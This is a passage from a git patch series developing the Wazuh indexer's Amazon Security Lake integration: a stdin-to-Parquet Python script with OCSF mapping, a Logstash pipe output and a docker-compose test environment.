event["rule"]["description"], - "types": [ - event["input"]["type"] - ], - "uid": event['id'] - }, - "metadata": { - "log_name": "Security events", - "log_provider": "Wazuh", - "product": { - "name": "Wazuh", - "lang": "en", - "vendor_name": "Wazuh, Inc,." - }, - "version": "1.1.0", - }, - "raw_data": event["full_log"], - "resources": [ - { - "name": event["agent"]["name"], - "uid": event["agent"]["id"] - }, - ], - "risk_score": event["rule"]["level"], - "severity_id": normalize(event["rule"]["level"]), - "status_id": 99, - "time": event["timestamp"], - "type_uid": 200401, - "unmapped": { - "data_sources": [ - event["_index"], - event["location"], - event["manager"]["name"] - ], - "nist": event["rule"]["nist_800_53"], # Array - } - } + "name": event["_source"]["agent"]["name"], + "uid": event["_source"]["agent"]["id"] + }, + ], + "risk_score": event["_source"]["rule"]["level"], + "severity_id": normalize(event["_source"]["rule"]["level"]), + "status_id": 99, + "time": event["_source"]["timestamp"], + "type_uid": 200401, + "unmapped": { + "data_sources": [ + #event["_source"]["_index"], + event["_source"]["location"], + event["_source"]["manager"]["name"] + ], + #"nist": event["_source"]["rule"]["nist_800_53"], # Array + } + } - return ocsf_class_template + return ocsf_class_template diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index 49926a8aa1d64..4fdecc14c073e 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -1,4 +1,4 @@ -#!/usr/bin/env python3 +#!/src/wazuh-indexer/integrations/amazon-security-lake/bin/python3 import os import sys @@ -7,44 +7,18 @@ import time import json import datetime -from pyarrow import parquet, Table, fs - +from pyarrow import parquet, Table from ocsf import converter block_ending = { "block_ending": True } -s3 = fs.S3FileSystem() - -#def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema): -# ocsf_output = {} -# ### Put constants into the output alert -# ocsf_output |= mappings[ocsfschema]['constants'] -# -# for key in mappings[ocsfschema]['mappings']: -# dotted_destination_field = mappings[ocsfschema]['mappings'].get(key) -# depth_levels = dotted_destination.split('.') -# current_level = alert_dictionary[depth_levels[0]] -# if len(depth_levels>1): -# for field in depth_levels[1:]: -# current_level = current_level[field] -# ocsf_output[key] = current_level -# ### We probably need to crop the fields we already -# ### mapped to OCSF from ocsf_output -# ocsf_output['unmapped'] = alert_dictionary - -def encode_parquet(list,bucket_name,folder): - ### We can write directly to S3 from pyarrow: - ### https://arrow.apache.org/docs/python/filesystems.html#s3 - ### https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream - ### - ### Credentials can be stored in ~/.aws/credentials - ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html - +def encode_parquet(list,foldername,filename): table = Table.from_pylist(list) - parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name, folder)) + parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) def map_block(fileobject, length): output=[] + ocsf_mapped_alert = {} for line in range(0, length): line = fileobject.readline() if line == '': @@ -52,36 +26,28 @@ def map_block(fileobject, length): break alert = json.loads(line) ocsf_mapped_alert = converter.convert(alert) - #map_to_ocsf(alert, mappings, ocsf_mapped_alert): - output.append(ocsf_mapped_alert) + output.append(ocsf_mapped_alert) return output def get_elapsedseconds(reference_timestamp): current_time = datetime.datetime.now(datetime.timezone.utc) return (current_time - reference_timestamp).total_seconds() - if __name__ == "__main__": - clock = datetime.datetime.now(datetime.timezone.utc) - clockstr = clock.strftime('%F_%H.%M.%S') + date = datetime.datetime.now(datetime.timezone.utc).strftime('%F_%H.%M.%S') parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - parser.add_argument('-b','--bucketname', action='store', help='Name of the output S3 bucket') - parser.add_argument('-f','--foldername', action='store', help='Name of the output S3 bucket\'s folder') - parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') - parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') - parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') - parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') - parser.add_argument('-v','--ocsfschema', action='store', default='1.1.0', help='Version of the OCSF schema to use') - parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', help='Location of the Wazuh Alert to OCSF mapping (json formatted)') - parser.add_argument('-o','--output', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') - parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') + parser.add_argument('-d','--debug', type=bool, action='store_true', help='Activate debugging') + parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') + parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') + parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') + parser.add_argument('-n','--linebuffer', type=int, action='store', default=100, help='stdin line buffer length') + parser.add_argument('-o','--outputfolder', type=str, action='store', help='Folder or S3 bucket URL to dump parquet files to') + parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval') args = parser.parse_args() - logging.basicConfig(format='%(asctime)s %(message)s', filename=args.output, encoding='utf-8', level=logging.DEBUG) + logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG) logging.info('BUFFERING STDIN') try: - #with open(ocsf_mapping_filename) as jsonfile: - # mappings = json.loads(jsonfile.read()) with os.fdopen(sys.stdin.fileno(), 'rt') as stdin: output_buffer = [] @@ -89,22 +55,20 @@ def get_elapsedseconds(reference_timestamp): try: while True: - ### We can possibly replace all the custom code here - ### and just use Arrow's built-in input and output facilities: - ### * https://arrow.apache.org/docs/python/memory.html#input-and-output - ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas - ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory - - current_block = map_block(stdin, args.linebuffer ) - if current_block[-1] == block_ending : - output_buffer += current_block[0:current_block.index(block_ending)] - time.sleep(args.sleeptime) + if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - encode_parquet(output_buffer,args.bucketname,args.foldername) + encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date)) logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.datetime.now(datetime.timezone.utc) output_buffer = [] - output_buffer.append(current_block) + + current_block = map_block( stdin, args.linebuffer ) + + if current_block[-1] == block_ending: + output_buffer += current_block[0:-1] + time.sleep(args.sleeptime) + else: + output_buffer += current_block except KeyboardInterrupt: logging.info("Keyboard Interrupt issued") @@ -116,4 +80,3 @@ def get_elapsedseconds(reference_timestamp): logging.error("Error running script") logging.error(e) raise - exit(1) From ab56e896868cdef5fdeee92a42a8e1b00b5fae9f Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 16 Feb 2024 15:38:53 -0300 Subject: [PATCH 20/77] Remove unnecessary type declaration from debug flag --- integrations/amazon-security-lake/stdin_to_securitylake.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index 4fdecc14c073e..b8fa6c17bbf4c 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -36,7 +36,7 @@ def get_elapsedseconds(reference_timestamp): if __name__ == "__main__": date = datetime.datetime.now(datetime.timezone.utc).strftime('%F_%H.%M.%S') parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - parser.add_argument('-d','--debug', type=bool, action='store_true', help='Activate debugging') + parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') From 7fc49e72ae93fd9620fc7f467a37eef714d53d6c Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 16 Feb 2024 17:00:15 -0300 Subject: [PATCH 21/77] Improved parquet encoding --- .../stdin_to_securitylake.py | 29 ++++++++++++------- 1 file changed, 19 insertions(+), 10 deletions(-) diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index b8fa6c17bbf4c..ec90025d9afa3 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -1,4 +1,4 @@ -#!/src/wazuh-indexer/integrations/amazon-security-lake/bin/python3 +#!/home/fede/src/wazuh-indexer/integrations/amazon-security-lake/venv/bin/python3 import os import sys @@ -13,8 +13,13 @@ block_ending = { "block_ending": True } def encode_parquet(list,foldername,filename): - table = Table.from_pylist(list) - parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) + try: + table = Table.from_pylist(list) + print(table) + parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) + except Exception as e: + logging.error(e) + raise def map_block(fileobject, length): output=[] @@ -44,7 +49,8 @@ def get_elapsedseconds(reference_timestamp): parser.add_argument('-o','--outputfolder', type=str, action='store', help='Folder or S3 bucket URL to dump parquet files to') parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval') args = parser.parse_args() - logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG) + #logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG) + logging.basicConfig(format='%(asctime)s %(message)s', encoding='utf-8', level=logging.DEBUG) logging.info('BUFFERING STDIN') try: @@ -55,12 +61,6 @@ def get_elapsedseconds(reference_timestamp): try: while True: - - if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date)) - logging.debug(json.dumps(output_buffer)) - starttimestamp = datetime.datetime.now(datetime.timezone.utc) - output_buffer = [] current_block = map_block( stdin, args.linebuffer ) @@ -70,6 +70,15 @@ def get_elapsedseconds(reference_timestamp): else: output_buffer += current_block + if len(output_buffer) == 0: + continue + + if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: + logging.info('Writing data to parquet file') + encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date)) + starttimestamp = datetime.datetime.now(datetime.timezone.utc) + output_buffer = [] + except KeyboardInterrupt: logging.info("Keyboard Interrupt issued") exit(0) From 67b785f0f2c5aeb118aa27003e6c0b01cad83ecc Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Mon, 19 Feb 2024 15:38:04 -0300 Subject: [PATCH 22/77] Initial commit for test env's docker-compose.yml --- .../stdin_to_securitylake.py | 1 - integrations/docker/docker-compose.yml | 117 ++++++++++++++++++ 2 files changed, 117 insertions(+), 1 deletion(-) create mode 100644 integrations/docker/docker-compose.yml diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index ec90025d9afa3..eee82036c3ff5 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -15,7 +15,6 @@ def encode_parquet(list,foldername,filename): try: table = Table.from_pylist(list) - print(table) parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) except Exception as e: logging.error(e) diff --git a/integrations/docker/docker-compose.yml b/integrations/docker/docker-compose.yml new file mode 100644 index 0000000000000..ebd6b348c5116 --- /dev/null +++ b/integrations/docker/docker-compose.yml @@ -0,0 +1,117 @@ +version: "3.8" + +services: + + events-generator: + image: events-generator + build: + dockerfile_inline: | + FROM ubuntu:20.04 + RUN apt update && apt install -y python3-requests + container_name: events-generator + volumes: + - ../tools/events-generator:/home/events-generator + hostname: events-generator + working_dir: "/home/events-generator" + entrypoint: sh -c "python3 run.py" + networks: + wazuh-indexer-dev: + aliases: + - events-generator + ipv4_address: 172.18.0.2 + depends_on: + - wazuh-indexer + + wazuh-indexer: + image: wazuh/wazuh-indexer:4.8.0-beta1 + container_name: wazuh-indexer + hostname: wazuh-indexer + restart: always + networks: + wazuh-indexer-dev: + aliases: + - wazuh-indexer + ipv4_address: 172.18.0.3 + ports: + - "9222:9200" + depends_on: + - generator + environment: + - "OPENSEARCH_JAVA_OPTS=-Xms1g -Xmx1g" + - "bootstrap.memory_lock=true" + - 'INDEXER_PASSWORD=SecretPassword' + ulimits: + memlock: + soft: -1 + hard: -1 + nofile: + soft: 65536 + hard: 65536 + volumes: + - ./wazuh-indexer-data:/var/lib/wazuh-indexer + - ./config/wazuh_indexer_ssl_certs/root-ca.pem:/usr/share/wazuh-indexer/certs/root-ca.pem + - ./config/wazuh_indexer_ssl_certs/wazuh1.indexer-key.pem:/usr/share/wazuh-indexer/certs/wazuh1.indexer.key + - ./config/wazuh_indexer_ssl_certs/wazuh1.indexer.pem:/usr/share/wazuh-indexer/certs/wazuh1.indexer.pem + - ./config/wazuh_indexer_ssl_certs/admin.pem:/usr/share/wazuh-indexer/certs/admin.pem + - ./config/wazuh_indexer_ssl_certs/admin-key.pem:/usr/share/wazuh-indexer/certs/admin-key.pem + - ./config/wazuh_indexer/wazuh1.indexer.yml:/usr/share/wazuh-indexer/opensearch.yml + - ./config/wazuh_indexer/internal_users.yml:/usr/share/wazuh-indexer/opensearch-security/internal_users.yml + + generator: + image: wazuh/wazuh-certs-generator:0.0.1 + hostname: wazuh-certs-generator + volumes: + - ./config/wazuh_indexer_ssl_certs/:/certificates/ + - ./config/certs.yml:/config/certs.yml + environment: + - HTTP_PROXY=YOUR_PROXY_ADDRESS_OR_DNS + + logstash: + image: logstash + build: + dockerfile_inline: | + FROM ubuntu:20.04 + RUN apt update && apt install -y iputils-ping wget gpg apt-transport-https + WORKDIR /home/logstash + RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \ + echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-8.x.list && \ + apt update && \ + apt install -y logstash && \ + chown -R logstash:logstash /etc/logstash && \ + chown logstash:logstash /home/logstash + entrypoint: /usr/share/bin/logstash --path.settings /etc/logstash --config.reload.automatic + container_name: logstash + hostname: logstash + user: logstash + volumes: + - ../amazon-security-lake:/home/logstash + - ../amazon-security-lake/logstash/pipe-output.conf:/etc/logstash/conf.d/pipe-output.conf + - ../amazon-security-lake/logstash/pipelines.yml:/etc/logstash/pipelines.yml + networks: + wazuh-indexer-dev: + aliases: + - logstash + ipv4_address: 172.18.0.4 + depends_on: + - wazuh-indexer + - s3-ninja + + s3-ninja: + image: scireum/s3-ninja + container_name: s3-ninja + hostname: s3-ninja + volumes: + - ./s3-ninja_data:/home/sirius/data + networks: + wazuh-indexer-dev: + aliases: + - s3-ninja + ipv4_address: 172.18.0.5 + ports: + - "9444:9000" + +networks: + wazuh-indexer-dev: + ipam: + config: + - subnet: "172.18.0.0/16" From 0bf697df314e58cb3818ea2aef72ff3b685b6fa5 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Mon, 19 Feb 2024 16:52:36 -0300 Subject: [PATCH 23/77] Remove sudo references from docker-compose.yml --- integrations/docker/docker-compose.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/integrations/docker/docker-compose.yml b/integrations/docker/docker-compose.yml index ebd6b348c5116..dd7f12f119e05 100644 --- a/integrations/docker/docker-compose.yml +++ b/integrations/docker/docker-compose.yml @@ -73,8 +73,8 @@ services: FROM ubuntu:20.04 RUN apt update && apt install -y iputils-ping wget gpg apt-transport-https WORKDIR /home/logstash - RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \ - echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-8.x.list && \ + RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \ + echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | tee -a /etc/apt/sources.list.d/elastic-8.x.list && \ apt update && \ apt install -y logstash && \ chown -R logstash:logstash /etc/logstash && \ From 159adcb5e33ab0d3b99fd274f00a0e38028b075d Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Mon, 5 Feb 2024 15:47:23 -0300 Subject: [PATCH 24/77] Adding Python script that receives a continuous json stream over stdin and outputs parquet to Security Lake --- integrations/stdin_to_securitylake.py | 86 +++++++++++++++++++++++++++ 1 file changed, 86 insertions(+) create mode 100755 integrations/stdin_to_securitylake.py diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py new file mode 100755 index 0000000000000..fd70e41906ccb --- /dev/null +++ b/integrations/stdin_to_securitylake.py @@ -0,0 +1,86 @@ +#!/usr/bin/env python3 + +import os +import sys +import argparse +import logging +import time +from datetime import datetime +from pyarrow import json +import pyarrow.parquet as pq + +def encode_parquet(json_list): + for json in json_list: + ### read_json is meant for files, need to change it to read from a string + ### https://arrow.apache.org/docs/python/json.html + table = json.read_json(json) + pq.write_table(table, 'parquet/output.parquet') + +def push_to_s3(parquet): + ## Fill with AWS S3 code + pass + +def read_chunk(fileobject,length): + output=[] + for i in range(0,length): + line = fileobject.readline() + if line is '': + output.append(line) + break + output.append(line) + return output + +def get_elapsedtime(reference_timestamp): + current_time = datetime.now(tz='UTC') + return (current_time - reference_timestamp).total_seconds() + +if __name__ == "__main__": + + clock = datetime.now(tz='UTC') + clockstr = clock.strftime('%F_%H:%M:%S') + + parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') + + parser.add_argument('-n','--linebuffer', action='store', default=10 help='Lines to buffer') + parser.add_argument('-m','--maxlength', action='store', default=20 help='Lines to buffer') + parser.add_argument('-s','--sleeptime', action='store', default=5 help='Lines to buffer') + parser.add_argument('-i','--pushinterval', action='store', default=299 help='Lines to buffer') + + debugging = parser.add_argument_group('debugging') + debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') + debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') + + args = parser.parse_args() + + logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG) + logging.debug("Running main()") + logging.debug("Current time is " + str(clockstr) ) + + try: + logging.info('BUFFERING STDIN') + + with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin: + + output_buffer = [] + + starttimestamp = datetime.now(tz='UTC') + + try: + while True: + output_buffer.append(read_chunk(stdin,args.linebuffer)) + if output_buffer[len(output_buffer)-1] is '': + time.sleep(args.sleeptime) + if len(output_buffer) > args.maxlength or get_elapsedtime(starttimestamp) > args.pushinterval: + encode_parquet(output_buffer) + logging.debug(output_buffer) + starttimestamp = datetime.now(tz='UTC') + output_buffer = [] + except KeyboardInterrupt: + logging.info("Keyboard Interrupt issued") + exit(0) + + + logging.info('FINISHED RETRIEVING STDIN') + except Exception as e: + logging.error("Error running script") + exit(1) From 6e17aae0dc430737a6f73d239dd991b6b219d418 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Mon, 5 Feb 2024 15:50:39 -0300 Subject: [PATCH 25/77] Adding logstash pipeline for python script --- .../amazon-security-lake/pipe-output.conf | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 integrations/amazon-security-lake/pipe-output.conf diff --git a/integrations/amazon-security-lake/pipe-output.conf b/integrations/amazon-security-lake/pipe-output.conf new file mode 100644 index 0000000000000..4f64eb5a46a54 --- /dev/null +++ b/integrations/amazon-security-lake/pipe-output.conf @@ -0,0 +1,35 @@ +input { + opensearch { + hosts => ["127.0.0.1:9200"] + user => "${WAZUH_INDEXER_USERNAME}" + password => "${WAZUH_INDEXER_PASSWORD}" + index => "wazuh-alerts-4.x-*" + ssl => true + ca_file => "/etc/logstash/wi-certs/root-ca.pem" + query => '{ + "query": { + "range": { + "@timestamp": { + "gt": "now-1m" + } + } + } + }' + target => "_source" + schedule => "* * * * *" + } +} + +output { + + stdout { codec => rubydebug } + + pipe + { + id => "securityLake" + message_format => "%{_source}" + ttl => "10" + command => "/usr/bin/env python3 /usr/local/bin/stdin_to_securitylake.py -d" + } + +} From a05c23c080f6592fc5a4a53617983d558cebb752 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 13:23:34 -0300 Subject: [PATCH 26/77] encode_parquet() function fixed to handle lists of dictionaries --- integrations/stdin_to_securitylake.py | 65 ++++++++++++--------------- 1 file changed, 29 insertions(+), 36 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index fd70e41906ccb..a8295ed139262 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -5,16 +5,15 @@ import argparse import logging import time +import json from datetime import datetime -from pyarrow import json -import pyarrow.parquet as pq +from pyarrow import json, parquet, Table -def encode_parquet(json_list): - for json in json_list: - ### read_json is meant for files, need to change it to read from a string - ### https://arrow.apache.org/docs/python/json.html - table = json.read_json(json) - pq.write_table(table, 'parquet/output.parquet') +chunk_ending = { "chunk_ending": True } + +def encode_parquet(list): + table = Table.from_pylist(list) + pq.write_table(table, '/tmp/{}.parquet'.format(clockstr)) def push_to_s3(parquet): ## Fill with AWS S3 code @@ -24,63 +23,57 @@ def read_chunk(fileobject,length): output=[] for i in range(0,length): line = fileobject.readline() - if line is '': - output.append(line) + if line == '': + output.append(chunk_ending) break - output.append(line) + output.append(json.loads(line)) return output -def get_elapsedtime(reference_timestamp): +def get_elapsedseconds(reference_timestamp): current_time = datetime.now(tz='UTC') return (current_time - reference_timestamp).total_seconds() - -if __name__ == "__main__": - - clock = datetime.now(tz='UTC') - clockstr = clock.strftime('%F_%H:%M:%S') +def parse_arguments(): parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - - parser.add_argument('-n','--linebuffer', action='store', default=10 help='Lines to buffer') - parser.add_argument('-m','--maxlength', action='store', default=20 help='Lines to buffer') - parser.add_argument('-s','--sleeptime', action='store', default=5 help='Lines to buffer') - parser.add_argument('-i','--pushinterval', action='store', default=299 help='Lines to buffer') - + parser.add_argument('-n','--linebuffer', action='store', default=10 help='stdin line buffer length') + parser.add_argument('-m','--maxlength', action='store', default=20 help='Event number threshold for submission to Security Lake') + parser.add_argument('-s','--sleeptime', action='store', default=5 help='Input buffer polling interval') + parser.add_argument('-i','--pushinterval', action='store', default=299 help='Time interval for pushing data to Security Lake') debugging = parser.add_argument_group('debugging') debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') - args = parser.parse_args() - - logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG) - logging.debug("Running main()") - logging.debug("Current time is " + str(clockstr) ) +if __name__ == "__main__": + clock = datetime.now(tz='UTC') + clockstr = clock.strftime('%F_%H.%M.%S') + parse_arguments() + logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG) + logging.info('BUFFERING STDIN') + try: - logging.info('BUFFERING STDIN') with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin: - output_buffer = [] - starttimestamp = datetime.now(tz='UTC') try: while True: output_buffer.append(read_chunk(stdin,args.linebuffer)) - if output_buffer[len(output_buffer)-1] is '': + if output_buffer[len(output_buffer)-1] == chunk_ending : time.sleep(args.sleeptime) - if len(output_buffer) > args.maxlength or get_elapsedtime(starttimestamp) > args.pushinterval: - encode_parquet(output_buffer) - logging.debug(output_buffer) + if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: + push_to_s3(encode_parquet(output_buffer)) + logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.now(tz='UTC') output_buffer = [] + except KeyboardInterrupt: logging.info("Keyboard Interrupt issued") exit(0) - logging.info('FINISHED RETRIEVING STDIN') + except Exception as e: logging.error("Error running script") exit(1) From e04f0d53846556fbeb3a6eced7e71fc77b509344 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 13:25:13 -0300 Subject: [PATCH 27/77] Correct error in encode_parquet() --- integrations/stdin_to_securitylake.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index a8295ed139262..e11c23378b15b 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -7,13 +7,13 @@ import time import json from datetime import datetime -from pyarrow import json, parquet, Table +from pyarrow import parquet, Table chunk_ending = { "chunk_ending": True } def encode_parquet(list): table = Table.from_pylist(list) - pq.write_table(table, '/tmp/{}.parquet'.format(clockstr)) + parquet.write_table(table, '/tmp/{}.parquet'.format(clockstr)) def push_to_s3(parquet): ## Fill with AWS S3 code From 93935fc24dd0fe5d2a1519d0b5ec01e51cb05994 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 13:59:12 -0300 Subject: [PATCH 28/77] Avoid storing the block ending in the output buffer --- integrations/stdin_to_securitylake.py | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index e11c23378b15b..034b729c1208d 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -9,7 +9,10 @@ from datetime import datetime from pyarrow import parquet, Table -chunk_ending = { "chunk_ending": True } +block_ending = { "block_ending": True } + +def map_to_ocsf(): + ## Code that translates fields to OCSF def encode_parquet(list): table = Table.from_pylist(list) @@ -19,12 +22,12 @@ def push_to_s3(parquet): ## Fill with AWS S3 code pass -def read_chunk(fileobject,length): +def read_block(fileobject,length): output=[] for i in range(0,length): line = fileobject.readline() if line == '': - output.append(chunk_ending) + output.append(block_ending) break output.append(json.loads(line)) return output @@ -59,14 +62,16 @@ def parse_arguments(): try: while True: - output_buffer.append(read_chunk(stdin,args.linebuffer)) - if output_buffer[len(output_buffer)-1] == chunk_ending : + current_block = read_block(stdin,args.linebuffer) + if current_block[-1] == block_ending : + output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: push_to_s3(encode_parquet(output_buffer)) logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.now(tz='UTC') output_buffer = [] + output_buffer.append(current_block) except KeyboardInterrupt: logging.info("Keyboard Interrupt issued") From 1db384c0da0b0b2f60173861aa87a1c27e05494b Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 16:40:01 -0300 Subject: [PATCH 29/77] Add comments on handling files and streams with pyarrow for future reference --- integrations/stdin_to_securitylake.py | 17 ++++++++++++----- 1 file changed, 12 insertions(+), 5 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 034b729c1208d..1604bc2ed9ebc 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -15,13 +15,14 @@ def map_to_ocsf(): ## Code that translates fields to OCSF def encode_parquet(list): + ### We can write directly to S3 from pyarrow: + ### https://arrow.apache.org/docs/python/filesystems.html#s3 + ### + ### Credentials can be stored in /root/.aws/credentials + ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html table = Table.from_pylist(list) parquet.write_table(table, '/tmp/{}.parquet'.format(clockstr)) -def push_to_s3(parquet): - ## Fill with AWS S3 code - pass - def read_block(fileobject,length): output=[] for i in range(0,length): @@ -62,12 +63,18 @@ def parse_arguments(): try: while True: + ### We can possibly replace all the custom code here + ### and just use Arrow's built-in input and output facilities: + ### * https://arrow.apache.org/docs/python/memory.html#input-and-output + ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas + ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory + current_block = read_block(stdin,args.linebuffer) if current_block[-1] == block_ending : output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - push_to_s3(encode_parquet(output_buffer)) + encode_parquet(output_buffer) logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.now(tz='UTC') output_buffer = [] From c60045fbcf5a7ebd55be6054969f0f4c0fc3c46f Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 16:56:27 -0300 Subject: [PATCH 30/77] Add s3 handling reference links --- integrations/stdin_to_securitylake.py | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 1604bc2ed9ebc..d176bb38b004e 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -7,16 +7,19 @@ import time import json from 